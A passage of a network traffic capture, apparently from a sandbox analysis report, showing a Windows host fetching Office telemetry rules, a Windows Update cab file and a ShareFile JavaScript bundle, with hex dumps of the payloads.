                                                                                                                                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120617" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120615" /> <SR T="2" R="([Mm][Ii][Cc][Rr][Oo][Ss][Oo][Ff][Tt])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W"


                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                67192.168.2.64979113.107.246.45443
                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                2024-10-09 18:05:15 UTC192OUTGET /rules/rule120616v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                2024-10-09 18:05:16 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                Date: Wed, 09 Oct 2024 18:05:15 GMT
                                                                                                                                                                                                                                                                                Content-Type: text/xml
                                                                                                                                                                                                                                                                                Content-Length: 486
                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                Last-Modified: Tue, 09 Apr 2024 00:26:29 GMT
                                                                                                                                                                                                                                                                                ETag: "0x8DC582BB344914B"
                                                                                                                                                                                                                                                                                x-ms-request-id: d01f8df5-c01e-007a-10fd-19b877000000
                                                                                                                                                                                                                                                                                x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                x-azure-ref: 20241009T180515Z-185b7d577bdcmhtqq5qad662uw00000001c0000000010twd
                                                                                                                                                                                                                                                                                x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                2024-10-09 18:05:16 UTC486INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120616" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120615" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                68192.168.2.649787172.202.163.200443
                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                2024-10-09 18:05:16 UTC306OUTGET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=kFefy6H4XXZOUGE&MD=FZCGLLdL HTTP/1.1
                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33
                                                                                                                                                                                                                                                                                Host: slscr.update.microsoft.com
                                                                                                                                                                                                                                                                                2024-10-09 18:05:16 UTC560INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                                                                                                Content-Type: application/octet-stream
                                                                                                                                                                                                                                                                                Expires: -1
                                                                                                                                                                                                                                                                                Last-Modified: Mon, 01 Jan 0001 00:00:00 GMT
                                                                                                                                                                                                                                                                                ETag: "XAopazV00XDWnJCwkmEWRv6JkbjRA9QSSZ2+e/3MzEk=_2880"
                                                                                                                                                                                                                                                                                MS-CorrelationId: 7075be47-3d7e-4be8-8375-dffebcf5eaf6
                                                                                                                                                                                                                                                                                MS-RequestId: cd15523c-d6ce-4361-bedb-4a3c5cfdefa5
                                                                                                                                                                                                                                                                                MS-CV: N+jh9X7tUkaWbp2i.0
                                                                                                                                                                                                                                                                                X-Microsoft-SLSClientCache: 2880
                                                                                                                                                                                                                                                                                Content-Disposition: attachment; filename=environment.cab
                                                                                                                                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                Date: Wed, 09 Oct 2024 18:05:15 GMT
                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                Content-Length: 24490
                                                                                                                                                                                                                                                                                2024-10-09 18:05:16 UTC15824INData Raw: 4d 53 43 46 00 00 00 00 92 1e 00 00 00 00 00 00 44 00 00 00 00 00 00 00 03 01 01 00 01 00 04 00 23 d0 00 00 14 00 00 00 00 00 10 00 92 1e 00 00 18 41 00 00 00 00 00 00 00 00 00 00 64 00 00 00 01 00 01 00 e6 42 00 00 00 00 00 00 00 00 00 00 00 00 80 00 65 6e 76 69 72 6f 6e 6d 65 6e 74 2e 63 61 62 00 78 cf 8d 5c 26 1e e6 42 43 4b ed 5c 07 54 13 db d6 4e a3 f7 2e d5 d0 3b 4c 42 af 4a 57 10 e9 20 bd 77 21 94 80 88 08 24 2a 02 02 d2 55 10 a4 a8 88 97 22 8a 0a d2 11 04 95 ae d2 8b 20 28 0a 88 20 45 05 f4 9f 80 05 bd ed dd f7 ff 77 dd f7 bf 65 d6 4a 66 ce 99 33 67 4e d9 7b 7f fb db 7b 56 f4 4d 34 b4 21 e0 a7 03 0a d9 fc 68 6e 1d 20 70 28 14 02 85 20 20 ad 61 10 08 e3 66 0d ed 66 9b 1d 6a 90 af 1f 17 f0 4b 68 35 01 83 6c fb 44 42 5c 7d 83 3d 03 30 be 3e ae be 58
                                                                                                                                                                                                                                                                                Data Ascii: MSCFD#AdBenvironment.cabx\&BCK\TN.;LBJW w!$*U" ( EweJf3gN{{VM4!hn p( affjKh5lDB\}=0>X
                                                                                                                                                                                                                                                                                2024-10-09 18:05:16 UTC8666INData Raw: 04 01 31 2f 30 2d 30 0a 02 05 00 e1 2b 8a 50 02 01 00 30 0a 02 01 00 02 02 12 fe 02 01 ff 30 07 02 01 00 02 02 11 e6 30 0a 02 05 00 e1 2c db d0 02 01 00 30 36 06 0a 2b 06 01 04 01 84 59 0a 04 02 31 28 30 26 30 0c 06 0a 2b 06 01 04 01 84 59 0a 03 02 a0 0a 30 08 02 01 00 02 03 07 a1 20 a1 0a 30 08 02 01 00 02 03 01 86 a0 30 0d 06 09 2a 86 48 86 f7 0d 01 01 05 05 00 03 81 81 00 0c d9 08 df 48 94 57 65 3e ad e7 f2 17 9c 1f ca 3d 4d 6c cd 51 e1 ed 9c 17 a5 52 35 0f fd de 4b bd 22 92 c5 69 e5 d7 9f 29 23 72 40 7a ca 55 9d 8d 11 ad d5 54 00 bb 53 b4 87 7b 72 84 da 2d f6 e3 2c 4f 7e ba 1a 58 88 6e d6 b9 6d 16 ae 85 5b b5 c2 81 a8 e0 ee 0a 9c 60 51 3a 7b e4 61 f8 c3 e4 38 bd 7d 28 17 d6 79 f0 c8 58 c6 ef 1f f7 88 65 b1 ea 0a c0 df f7 ee 5c 23 c2 27 fd 98 63 08 31
                                                                                                                                                                                                                                                                                Data Ascii: 1/0-0+P000,06+Y1(0&0+Y0 00*HHWe>=MlQR5K"i)#r@zUTS{r-,O~Xnm[`Q:{a8}(yXe\#'c1


                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                69192.168.2.64979013.107.246.45443
                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                2024-10-09 18:05:16 UTC192OUTGET /rules/rule120615v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                2024-10-09 18:05:16 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                Date: Wed, 09 Oct 2024 18:05:16 GMT
                                                                                                                                                                                                                                                                                Content-Type: text/xml
                                                                                                                                                                                                                                                                                Content-Length: 407
                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                Last-Modified: Tue, 09 Apr 2024 00:26:42 GMT
                                                                                                                                                                                                                                                                                ETag: "0x8DC582BBAD04B7B"
                                                                                                                                                                                                                                                                                x-ms-request-id: 10c2f716-901e-00ac-1a5c-1ab69e000000
                                                                                                                                                                                                                                                                                x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                x-azure-ref: 20241009T180516Z-185b7d577bd787g6hpze00e34800000000ng000000013zx6
                                                                                                                                                                                                                                                                                x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                2024-10-09 18:05:16 UTC407INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 41 61 5d 5b 53 73 5d 5b 55 75 5d 5b 53 73 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20
                                                                                                                                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120615" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120613" /> <SR T="2" R="([Aa][Ss][Uu][Ss])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">


                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                70192.168.2.64979513.224.189.1154432612C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                2024-10-09 18:05:16 UTC422OUTGET /sharefile-web/sharefiledev-templates-pilet/0.108.2/package/dist/index.js HTTP/1.1
                                                                                                                                                                                                                                                                                Host: piletfeed-cdn.sharefile.io
                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                                Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                2024-10-09 18:05:16 UTC549INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                Content-Type: application/x-javascript
                                                                                                                                                                                                                                                                                Content-Length: 690173
                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                Date: Wed, 09 Oct 2024 10:38:20 GMT
                                                                                                                                                                                                                                                                                Last-Modified: Wed, 09 Oct 2024 10:30:30 GMT
                                                                                                                                                                                                                                                                                ETag: "66960f160a996198483c9b80db9bb067"
                                                                                                                                                                                                                                                                                x-amz-server-side-encryption: AES256
                                                                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                Server: AmazonS3
                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                X-Cache: Hit from cloudfront
                                                                                                                                                                                                                                                                                Via: 1.1 ba5b5e2e7fd98c4a472633bc4c1d4480.cloudfront.net (CloudFront)
                                                                                                                                                                                                                                                                                X-Amz-Cf-Pop: FRA2-C1
                                                                                                                                                                                                                                                                                X-Amz-Cf-Id: M1GcNiKKH8QmKzygg4VEexmTbMlfGAuk0Cwi4Pu8nyNKocRmvoICMw==
                                                                                                                                                                                                                                                                                Age: 26817
                                                                                                                                                                                                                                                                                Vary: Origin
                                                                                                                                                                                                                                                                                2024-10-09 18:05:16 UTC15835INData Raw: 2f 2f 40 70 69 6c 65 74 20 76 3a 32 28 77 65 62 70 61 63 6b 43 68 75 6e 6b 70 72 5f 73 68 61 72 65 66 69 6c 65 64 65 76 74 65 6d 70 6c 61 74 65 73 70 69 6c 65 74 2c 7b 7d 29 0a 53 79 73 74 65 6d 2e 72 65 67 69 73 74 65 72 28 5b 22 40 63 69 74 72 69 74 65 2f 73 66 2d 61 70 69 22 2c 22 40 73 68 61 72 65 66 69 6c 65 64 65 76 2f 61 6e 74 64 2d 63 6f 6e 66 69 67 22 2c 22 61 6e 74 64 22 2c 22 72 65 61 63 74 22 2c 22 72 65 61 63 74 2d 64 6f 6d 22 2c 22 72 65 61 63 74 2d 72 6f 75 74 65 72 22 2c 22 72 65 61 63 74 2d 72 6f 75 74 65 72 2d 64 6f 6d 22 2c 22 74 73 6c 69 62 22 5d 2c 28 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 76 61 72 20 6e 3d 7b 7d 2c 72 3d 7b 7d 2c 61 3d 7b 7d 2c 73 3d 7b 7d 2c 69 3d 7b 7d 2c 6f 3d 7b 7d 2c 6c 3d 7b 7d 2c 75 3d 7b 7d 3b 72 65 74 75
                                                                                                                                                                                                                                                                                Data Ascii: //@pilet v:2(webpackChunkpr_sharefiledevtemplatespilet,{})System.register(["@citrite/sf-api","@sharefiledev/antd-config","antd","react","react-dom","react-router","react-router-dom","tslib"],(function(e,t){var n={},r={},a={},s={},i={},o={},l={},u={};retu
                                                                                                                                                                                                                                                                                2024-10-09 18:05:16 UTC16384INData Raw: 6e 74 7c 7c 74 68 69 73 2e 65 6d 69 74 28 22 61 64 64 65 64 22 2c 65 2c 74 2c 6e 29 7d 7d 2c 7b 6b 65 79 3a 22 72 65 6d 6f 76 65 52 65 73 6f 75 72 63 65 42 75 6e 64 6c 65 22 2c 76 61 6c 75 65 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 74 68 69 73 2e 68 61 73 52 65 73 6f 75 72 63 65 42 75 6e 64 6c 65 28 65 2c 74 29 26 26 64 65 6c 65 74 65 20 74 68 69 73 2e 64 61 74 61 5b 65 5d 5b 74 5d 2c 74 68 69 73 2e 72 65 6d 6f 76 65 4e 61 6d 65 73 70 61 63 65 73 28 74 29 2c 74 68 69 73 2e 65 6d 69 74 28 22 72 65 6d 6f 76 65 64 22 2c 65 2c 74 29 7d 7d 2c 7b 6b 65 79 3a 22 68 61 73 52 65 73 6f 75 72 63 65 42 75 6e 64 6c 65 22 2c 76 61 6c 75 65 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 67 65 74 52 65 73 6f 75 72 63 65 28 65 2c 74
                                                                                                                                                                                                                                                                                Data Ascii: nt||this.emit("added",e,t,n)}},{key:"removeResourceBundle",value:function(e,t){this.hasResourceBundle(e,t)&&delete this.data[e][t],this.removeNamespaces(t),this.emit("removed",e,t)}},{key:"hasResourceBundle",value:function(e,t){return this.getResource(e,t
                                                                                                                                                                                                                                                                                2024-10-09 18:05:16 UTC16384INData Raw: 3d 31 26 26 65 25 31 30 30 21 3d 31 31 3f 30 3a 65 25 31 30 3e 3d 32 26 26 28 65 25 31 30 30 3c 31 30 7c 7c 65 25 31 30 30 3e 3d 32 30 29 3f 31 3a 32 29 7d 2c 31 36 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 4e 75 6d 62 65 72 28 65 25 31 30 3d 3d 31 26 26 65 25 31 30 30 21 3d 31 31 3f 30 3a 30 21 3d 3d 65 3f 31 3a 32 29 7d 2c 31 37 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 4e 75 6d 62 65 72 28 31 3d 3d 65 7c 7c 65 25 31 30 3d 3d 31 26 26 65 25 31 30 30 21 3d 31 31 3f 30 3a 31 29 7d 2c 31 38 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 4e 75 6d 62 65 72 28 30 3d 3d 65 3f 30 3a 31 3d 3d 65 3f 31 3a 32 29 7d 2c 31 39 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 4e 75 6d 62 65 72 28 31 3d 3d 65
                                                                                                                                                                                                                                                                                Data Ascii: =1&&e%100!=11?0:e%10>=2&&(e%100<10||e%100>=20)?1:2)},16:function(e){return Number(e%10==1&&e%100!=11?0:0!==e?1:2)},17:function(e){return Number(1==e||e%10==1&&e%100!=11?0:1)},18:function(e){return Number(0==e?0:1==e?1:2)},19:function(e){return Number(1==e
                                                                                                                                                                                                                                                                                2024-10-09 18:05:16 UTC16384INData Raw: 27 29 2e 63 6f 6e 63 61 74 28 74 2c 27 22 20 77 61 73 20 6e 6f 74 20 79 65 74 20 6c 6f 61 64 65 64 27 29 2c 22 54 68 69 73 20 6d 65 61 6e 73 20 73 6f 6d 65 74 68 69 6e 67 20 49 53 20 57 52 4f 4e 47 20 69 6e 20 79 6f 75 72 20 73 65 74 75 70 2e 20 59 6f 75 20 61 63 63 65 73 73 20 74 68 65 20 74 20 66 75 6e 63 74 69 6f 6e 20 62 65 66 6f 72 65 20 69 31 38 6e 65 78 74 2e 69 6e 69 74 20 2f 20 69 31 38 6e 65 78 74 2e 6c 6f 61 64 4e 61 6d 65 73 70 61 63 65 20 2f 20 69 31 38 6e 65 78 74 2e 63 68 61 6e 67 65 4c 61 6e 67 75 61 67 65 20 77 61 73 20 64 6f 6e 65 2e 20 57 61 69 74 20 66 6f 72 20 74 68 65 20 63 61 6c 6c 62 61 63 6b 20 6f 72 20 50 72 6f 6d 69 73 65 20 74 6f 20 72 65 73 6f 6c 76 65 20 62 65 66 6f 72 65 20 61 63 63 65 73 73 69 6e 67 20 69 74 21 21 21 22 29
                                                                                                                                                                                                                                                                                Data Ascii: ').concat(t,'" was not yet loaded'),"This means something IS WRONG in your setup. You access the t function before i18next.init / i18next.loadNamespace / i18next.changeLanguage was done. Wait for the callback or Promise to resolve before accessing it!!!")
                                                                                                                                                                                                                                                                                2024-10-09 18:05:16 UTC16384INData Raw: 61 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 65 28 29 7b 21 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 69 66 28 21 28 65 20 69 6e 73 74 61 6e 63 65 6f 66 20 74 29 29 74 68 72 6f 77 20 6e 65 77 20 54 79 70 65 45 72 72 6f 72 28 22 43 61 6e 6e 6f 74 20 63 61 6c 6c 20 61 20 63 6c 61 73 73 20 61 73 20 61 20 66 75 6e 63 74 69 6f 6e 22 29 7d 28 74 68 69 73 2c 65 29 7d 72 65 74 75 72 6e 20 72 28 65 2c 6e 75 6c 6c 2c 5b 7b 6b 65 79 3a 22 68 61 73 68 22 2c 76 61 6c 75 65 3a 66 75 6e 63 74 69 6f 6e 28 74 29 7b 72 65 74 75 72 6e 20 65 2e 68 65 78 28 65 2e 6d 64 35 31 28 74 29 29 7d 7d 2c 7b 6b 65 79 3a 22 6d 64 35 63 79 63 6c 65 22 2c 76 61 6c 75 65 3a 66 75 6e 63 74 69 6f 6e 28 74 2c 6e 29 7b 76 61 72 20 72 3d 74 5b 30 5d 2c 61 3d 74 5b 31 5d 2c
                                                                                                                                                                                                                                                                                Data Ascii: a=function(){function e(){!function(e,t){if(!(e instanceof t))throw new TypeError("Cannot call a class as a function")}(this,e)}return r(e,null,[{key:"hash",value:function(t){return e.hex(e.md51(t))}},{key:"md5cycle",value:function(t,n){var r=t[0],a=t[1],
                                                                                                                                                                                                                                                                                2024-10-09 18:05:16 UTC16384INData Raw: 29 3d 3e 73 65 7d 29 3b 76 61 72 20 72 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 65 28 65 29 7b 76 61 72 20 74 3d 74 68 69 73 3b 74 68 69 73 2e 5f 69 6e 73 65 72 74 54 61 67 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 6e 3b 6e 3d 30 3d 3d 3d 74 2e 74 61 67 73 2e 6c 65 6e 67 74 68 3f 74 2e 69 6e 73 65 72 74 69 6f 6e 50 6f 69 6e 74 3f 74 2e 69 6e 73 65 72 74 69 6f 6e 50 6f 69 6e 74 2e 6e 65 78 74 53 69 62 6c 69 6e 67 3a 74 2e 70 72 65 70 65 6e 64 3f 74 2e 63 6f 6e 74 61 69 6e 65 72 2e 66 69 72 73 74 43 68 69 6c 64 3a 74 2e 62 65 66 6f 72 65 3a 74 2e 74 61 67 73 5b 74 2e 74 61 67 73 2e 6c 65 6e 67 74 68 2d 31 5d 2e 6e 65 78 74 53 69 62 6c 69 6e 67 2c 74 2e 63 6f 6e 74 61 69 6e 65 72 2e 69 6e 73 65 72 74 42 65 66 6f 72 65 28 65 2c
                                                                                                                                                                                                                                                                                Data Ascii: )=>se});var r=function(){function e(e){var t=this;this._insertTag=function(e){var n;n=0===t.tags.length?t.insertionPoint?t.insertionPoint.nextSibling:t.prepend?t.container.firstChild:t.before:t.tags[t.tags.length-1].nextSibling,t.container.insertBefore(e,
                                                                                                                                                                                                                                                                                2024-10-09 18:05:16 UTC16384INData Raw: 65 7c 64 65 73 63 65 6e 74 7c 64 69 66 66 75 73 65 43 6f 6e 73 74 61 6e 74 7c 64 69 72 65 63 74 69 6f 6e 7c 64 69 73 70 6c 61 79 7c 64 69 76 69 73 6f 72 7c 64 6f 6d 69 6e 61 6e 74 42 61 73 65 6c 69 6e 65 7c 64 75 72 7c 64 78 7c 64 79 7c 65 64 67 65 4d 6f 64 65 7c 65 6c 65 76 61 74 69 6f 6e 7c 65 6e 61 62 6c 65 42 61 63 6b 67 72 6f 75 6e 64 7c 65 6e 64 7c 65 78 70 6f 6e 65 6e 74 7c 65 78 74 65 72 6e 61 6c 52 65 73 6f 75 72 63 65 73 52 65 71 75 69 72 65 64 7c 66 69 6c 6c 7c 66 69 6c 6c 4f 70 61 63 69 74 79 7c 66 69 6c 6c 52 75 6c 65 7c 66 69 6c 74 65 72 7c 66 69 6c 74 65 72 52 65 73 7c 66 69 6c 74 65 72 55 6e 69 74 73 7c 66 6c 6f 6f 64 43 6f 6c 6f 72 7c 66 6c 6f 6f 64 4f 70 61 63 69 74 79 7c 66 6f 63 75 73 61 62 6c 65 7c 66 6f 6e 74 46 61 6d 69 6c 79 7c 66
                                                                                                                                                                                                                                                                                Data Ascii: e|descent|diffuseConstant|direction|display|divisor|dominantBaseline|dur|dx|dy|edgeMode|elevation|enableBackground|end|exponent|externalResourcesRequired|fill|fillOpacity|fillRule|filter|filterRes|filterUnits|floodColor|floodOpacity|focusable|fontFamily|f
                                                                                                                                                                                                                                                                                2024-10-09 18:05:16 UTC16384INData Raw: 74 2b 34 5d 2c 37 2c 2d 31 37 36 34 31 38 38 39 37 29 2c 63 3d 73 28 63 2c 61 2c 75 2c 64 2c 65 5b 74 2b 35 5d 2c 31 32 2c 31 32 30 30 30 38 30 34 32 36 29 2c 64 3d 73 28 64 2c 63 2c 61 2c 75 2c 65 5b 74 2b 36 5d 2c 31 37 2c 2d 31 34 37 33 32 33 31 33 34 31 29 2c 75 3d 73 28 75 2c 64 2c 63 2c 61 2c 65 5b 74 2b 37 5d 2c 32 32 2c 2d 34 35 37 30 35 39 38 33 29 2c 61 3d 73 28 61 2c 75 2c 64 2c 63 2c 65 5b 74 2b 38 5d 2c 37 2c 31 37 37 30 30 33 35 34 31 36 29 2c 63 3d 73 28 63 2c 61 2c 75 2c 64 2c 65 5b 74 2b 39 5d 2c 31 32 2c 2d 31 39 35 38 34 31 34 34 31 37 29 2c 64 3d 73 28 64 2c 63 2c 61 2c 75 2c 65 5b 74 2b 31 30 5d 2c 31 37 2c 2d 34 32 30 36 33 29 2c 75 3d 73 28 75 2c 64 2c 63 2c 61 2c 65 5b 74 2b 31 31 5d 2c 32 32 2c 2d 31 39 39 30 34 30 34 31 36 32 29
                                                                                                                                                                                                                                                                                Data Ascii: t+4],7,-176418897),c=s(c,a,u,d,e[t+5],12,1200080426),d=s(d,c,a,u,e[t+6],17,-1473231341),u=s(u,d,c,a,e[t+7],22,-45705983),a=s(a,u,d,c,e[t+8],7,1770035416),c=s(c,a,u,d,e[t+9],12,-1958414417),d=s(d,c,a,u,e[t+10],17,-42063),u=s(u,d,c,a,e[t+11],22,-1990404162)
                                                                                                                                                                                                                                                                                2024-10-09 18:05:16 UTC16384INData Raw: 6d 65 6f 75 74 3d 76 6f 69 64 20 30 29 7d 7d 63 6c 61 73 73 20 57 20 65 78 74 65 6e 64 73 20 4e 7b 63 6f 6e 73 74 72 75 63 74 6f 72 28 65 29 7b 73 75 70 65 72 28 29 2c 74 68 69 73 2e 61 62 6f 72 74 53 69 67 6e 61 6c 43 6f 6e 73 75 6d 65 64 3d 21 31 2c 74 68 69 73 2e 64 65 66 61 75 6c 74 4f 70 74 69 6f 6e 73 3d 65 2e 64 65 66 61 75 6c 74 4f 70 74 69 6f 6e 73 2c 74 68 69 73 2e 73 65 74 4f 70 74 69 6f 6e 73 28 65 2e 6f 70 74 69 6f 6e 73 29 2c 74 68 69 73 2e 6f 62 73 65 72 76 65 72 73 3d 5b 5d 2c 74 68 69 73 2e 63 61 63 68 65 3d 65 2e 63 61 63 68 65 2c 74 68 69 73 2e 6c 6f 67 67 65 72 3d 65 2e 6c 6f 67 67 65 72 7c 7c 46 2c 74 68 69 73 2e 71 75 65 72 79 4b 65 79 3d 65 2e 71 75 65 72 79 4b 65 79 2c 74 68 69 73 2e 71 75 65 72 79 48 61 73 68 3d 65 2e 71 75 65 72
                                                                                                                                                                                                                                                                                Data Ascii: meout=void 0)}}class W extends N{constructor(e){super(),this.abortSignalConsumed=!1,this.defaultOptions=e.defaultOptions,this.setOptions(e.options),this.observers=[],this.cache=e.cache,this.logger=e.logger||F,this.queryKey=e.queryKey,this.queryHash=e.quer
                                                                                                                                                                                                                                                                                2024-10-09 18:05:16 UTC16384INData Raw: 75 72 72 65 6e 74 52 65 66 65 74 63 68 49 6e 74 65 72 76 61 6c 26 26 28 74 68 69 73 2e 72 65 66 65 74 63 68 49 6e 74 65 72 76 61 6c 49 64 3d 73 65 74 49 6e 74 65 72 76 61 6c 28 28 28 29 3d 3e 7b 28 74 68 69 73 2e 6f 70 74 69 6f 6e 73 2e 72 65 66 65 74 63 68 49 6e 74 65 72 76 61 6c 49 6e 42 61 63 6b 67 72 6f 75 6e 64 7c 7c 78 2e 69 73 46 6f 63 75 73 65 64 28 29 29 26 26 74 68 69 73 2e 65 78 65 63 75 74 65 46 65 74 63 68 28 29 7d 29 2c 74 68 69 73 2e 63 75 72 72 65 6e 74 52 65 66 65 74 63 68 49 6e 74 65 72 76 61 6c 29 29 7d 75 70 64 61 74 65 54 69 6d 65 72 73 28 29 7b 74 68 69 73 2e 75 70 64 61 74 65 53 74 61 6c 65 54 69 6d 65 6f 75 74 28 29 2c 74 68 69 73 2e 75 70 64 61 74 65 52 65 66 65 74 63 68 49 6e 74 65 72 76 61 6c 28 74 68 69 73 2e 63 6f 6d 70 75 74
